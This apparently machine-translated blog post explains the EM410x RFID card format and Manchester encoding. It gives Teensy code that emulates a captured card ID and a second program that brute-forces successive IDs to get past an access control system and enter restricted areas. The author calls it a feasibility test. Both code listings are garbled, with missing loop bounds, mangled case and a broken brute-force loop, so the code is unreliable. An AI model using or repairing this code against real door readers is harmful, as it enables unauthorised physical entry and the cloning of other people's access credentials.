Using Teensy for em410x card simulation and brute force crack em410x access System feasibility conjecture

A few days ago open started the teensy++2.0 simulation em410x, and for the em410x of access to a brute force test, the following is the relevant code and content.

What is low frequency? What is em410x?

First of all, I have to mention the low-frequency cards that work at 125khz frequencies (such as em410x) so that we can better read the following content.

What is low frequency? Here is the low-frequency explanation:

Low frequency (LF, frequency) refers to radio waves from 30KHz to 300KHz in the band. Some radio frequency identification (RFID technology) tags use low frequency. These labels are often referred to as Lfid ' s or Lowfid's (low frequency to identify lower Frequency identification).

However, Lfid ' S/lowfid's commonly used (not unique) frequency is 125khz/134khz,125khz/134khz is only low frequency RFID based on the frequency, the frequency does not have any functionality, that is, the frequency itself does not exist so-called ID recognition, read write, etc. and commonly used low-frequency cards have hid, t55xx, em410x and other series, these series of low-frequency cards are everyone in life often will be used to meet. And this time we're talking about the em410x series based on 125KHZ for access ID recognition.

The following is the em410x format:

1 1 1 1 1 1 1 1 1 9bits head

8 bits version or vendor ID

D00 D01 D02 D03 P0

D10 D11 D12 D13 P1

D20 D21 D22 D23 P2

D30 D31 D32 D33 P3

D40 D41 D42 D43 P4 10bits Row Inspection

D50 D51 D52 D53 P5

32bits data D60 D61 D62 D63 P6

D70 D71 D72 D73 P7

D80 D81 D82 D83 P8

D90 D91 D92 D93 P9

PC0 PC1 PC2 PC3 S0

4-bit column check

The 64 bits of data in 9 consecutive 1 as the beginning of the data, and d00-d93 is the user data, P0-P9 is the parity bit, PC0-PC3 is the parity bit, S0 for the data end bit.

Simple and popular section what is parity, is the number of data 1 is an odd or even .

For example: 0x01 binary is 0001 this data in the number of 1 is odd, if even check should be 00011 let 1 number is even, if the data is 1110 that parity of course is 11101, on the contrary if the odd check is 11100.

The following practical examples illustrate the em410x format:

If I have a em410x card, the ID printed on the card will be:

0005206306

If you read with a PROXMARK3 or a low-frequency reader, you will see that the ID will have a two-bit value, which is likely to be 8bit version, vendor or user ID. If we use Proxmark3 to read out the ID is:

0x0600503472

Corresponding to the 0x00503472=5206306, and the 0x06 is the identity, and its format will be what? Look at the following analysis:

The first is the data header:

111111111

Card Number data and line parity bit

0 = 0000 0

6 = 0110 0

0 = 0000 0

0 = 0000 0

5 = 0101 0

0 = 0000 0

3 = 0011 0

4 = 0100 1

7 = 0111 1

2 = 0010 1

p = 0001 (column parity bit)

0 End

By the above data we will therefore get the following values:

111111111 00000 01100 00000 00000 01010 00000 00110 01001 01111 00101 00010

This is the em410x format, if there is nothing to understand, please use Google and other search engines for information search, the next step is to talk about how to use teensy simulation em410x Tag

Hardware Components list:

1.125kHz-based low-frequency coils

2. Capacitance

3. Transistor 2N3904

4. Resistor 10K

5. teensy++2.0 This gadget write the following code, of course you can also use the Arduino Development Board.

// teensy+ + 2.0 Analog em410x code is as follows:

String Sstart = "1111111110000000000″;

String sstop = "0″;

int data_to_spoof[64];

int coil_pin = 9;

int a,b,c,d;

unsigned long ID;

Char Hexcode[8];



void Setup ()

{

Serial.begin (9600);

Pinmode (Coil_pin, OUTPUT);

Digitalwrite (Coil_pin, low);

id = 0x503472;

A=0;b=0;c=0;d=0;

sprintf (Hexcode, "%04x%04x", id);

String s = sstart + Em4xcode (hexcode[4]) + Em4xcode (hexcode[5]) + Em4xcode (hexcode[6]) + Em4xcode (hexcode[7]) + Em4xcode (H Excode[0]) + Em4xcode (hexcode[1]) + Em4xcode (hexcode[2]) + Em4xcode (hexcode[3]) + evenparity (a) + evenparity (b) + EvenPari Ty (c) + evenparity (d) + sstop;

Serial.println (s);

Tocode (s);



}



void Set_pin_manchester (int clock_half, int signal)

{

int man_encoded = clock_half ^ signal;

if (man_encoded = = 1)

{

Digitalwrite (Coil_pin, high);

}

Else

{

Digitalwrite (Coil_pin, low);

}

}



String Em4xcode (String code)

{

if (Code = = ' 1′) {D+=1;return "00011″;}

if (Code = = ' 2′) {C+=1;return "00101″;}

if (Code = = ' 3′) {C+=1;d+=1;return "00110″;}

if (Code = = ' 4′) {B+=1;return "01001″;}

if (Code = = ' 5′) {B+=1;d+=1;return "01010″;}

if (Code = = ' 6′) {B+=1;c+=1;return "01100″;}

if (Code = = ' 7′) {B+=1;c+=1;d+=1;return "01111″;}

if (Code = = ' 8′) {A+=1;return "10001″;}

if (Code = = ' 9′) {A+=1;d+=1;return "10010″;}

if (Code = = ' A ') {A+=1;c+=1;return "10100″;}

if (Code = = ' B ') {A+=1;c+=1;d+=1;return "10111″;}

if (Code = = ' C ') {A+=1;b+=1;return "11000″;}

if (Code = = ' D ') {A+=1;b+=1;d+=1;return "11011″;}

if (Code = = ' E ') {A+=1;b+=1;c+=1;return "11101″;}

if (Code = = ' F ') {A+=1;b+=1;c+=1;d+=1;return "11110″;}

Return "00000″;

}



String evenparity (int Parity)

{

if ((Parity% 2) = = 1) return "1″;

Return "0″;

}



void Tocode (String s)

{

for (int i = 0; i <; i++)

{

if (s[i]== ' 0′) {data_to_spoof[i]=0;} Else{data_to_spoof[i]=1;}

}

}

void Loop ()

{

for (int i = 0; i <; i++)

{

Set_pin_manchester (0, data_to_spoof[i]);

Delaymicroseconds (256);

Set_pin_manchester (1, data_to_spoof[i]);

Delaymicroseconds (256);

}

}

What is to be proposed here is that it is possible that you do not understand why so send, because it is encoded as: Manchester code, so I am in this also popular to say it.

For example, to send 64-bit data:

111111111 00000 01100 00000 00000 01010 00000 00110 01001 01111 00101 00010

How much time does it take to teleport 1 people? The answer is that 64,125khz equals 512us, which means that 512us forwards 1 bits, but the Manchester code is represented by 2 bits, and if the data is 1, the Manchester code is 10, the data is 0, and the Manchester code is 01. So the transfer time 512us to a data conversion to Manchester code transfer should be 512us/2=256us transfer one, however, the program is to convert 64-bit data into Manchester code sent, so the sending interval is delaymicroseconds (256);

When we use teensy for the relevant simulation, we find that as long as we do the relevant exhaustive test, or we can break through the restrictions of access control system more quickly into the restricted area, in the test environment, because the reader does not have any delay read appear, So we can be very quick to tagid the relevant, but because each access control has its own settings and environmental factors, we are not sure whether the following exhaustive code is suitable for everyone, so we just put forward a feasibility conjecture to write this article.

The following is a brute force test program code:

String Sstart = "1111111110000000000″; String sstop = "0″;int data_to_spoof[64];int led = 6;int Coil_pin = 9;int a,b,c,d;unsigned long id;char hexcode[8];void SE Tup () {//Serial.begin (9600);p Inmode (LED, output);p inmode (coil_pin, Output);d igitalwrite (Coil_pin, low); id = 0x502e96 ;} void Set_pin_manchester (int clock_half, int signal) {int man_encoded = clock_half ^ signal;if (man_encoded = = 1) {Digitalwri Te (Coil_pin, High);} Else{digitalwrite (Coil_pin, Low);}} String Em4xcode (String code) {if (Code = = ' 1′) {D+=1;return "00011″;} if (Code = = ' 2′) {C+=1;return "00101″;} if (Code = = ' 3′) {C+=1;d+=1;return "00110″;} if (Code = = ' 4′) {B+=1;return "01001″;} if (Code = = ' 5′) {B+=1;d+=1;return "01010″;} if (Code = = ' 6′) {B+=1;c+=1;return "01100″;} if (Code = = ' 7′) {B+=1;c+=1;d+=1;return "01111″;} if (Code = = ' 8′) {A+=1;return "10001″;} if (Code = = ' 9′) {A+=1;d+=1;return "10010″;} if (Code = = ' A ') {A+=1;c+=1;return "10100″;} if (Code = = ' B ') {A+=1;c+=1;d+=1;return "10111″;} if (Code = = ' C ') {A+=1;b+=1;return "11000″;}if (Code = = ' D ') {A+=1;b+=1;d+=1;return "11011″;} if (Code = = ' E ') {A+=1;b+=1;c+=1;return "11101″;} if (Code = = ' F ') {A+=1;b+=1;c+=1;d+=1;return "11110″;} Return "00000″;} String evenparity (int Parity) {if ((Parity% 2) = = 1) return "1″;return" 0″;} void Tocode (String s) {for (int i = 0; i <; I++{if (s[i]== ' 0′) {data_to_spoof[i]=0;} else{data_to_spoof[i]=1;}}} void Loop () {a=0;b=0;c=0;d=0;sprintf (Hexcode, "%04x%04x", id); String s = sstart + Em4xcode (hexcode[4]) + Em4xcode (hexcode[5]) + Em4xcode (hexcode[6]) + Em4xcode (hexcode[7]) + Em4xcode (H Excode[0]) + Em4xcode (hexcode[1]) + Em4xcode (hexcode[2]) + Em4xcode (hexcode[3]) + evenparity (a) + evenparity (b) + EvenPari Ty (c) + evenparity (d) + sstop;//serial.println (s); Tocode (s); for (int II = 0; II < 2; II++) {set_pin_manchester (0, data_to_spoof[i]);d elaymicroseconds (265); Set_pin_manchester (1, data_to_spoof[i]); Delaymicroseconds (265);}} if (id = = 0x50308a) {Digitalwrite (LED, high);} ID + = 1;if (id > 0xFFFFFFFF) {id=0;}}

Using Teensy for em410x card simulation and brute force crack em410x access System feasibility conjecture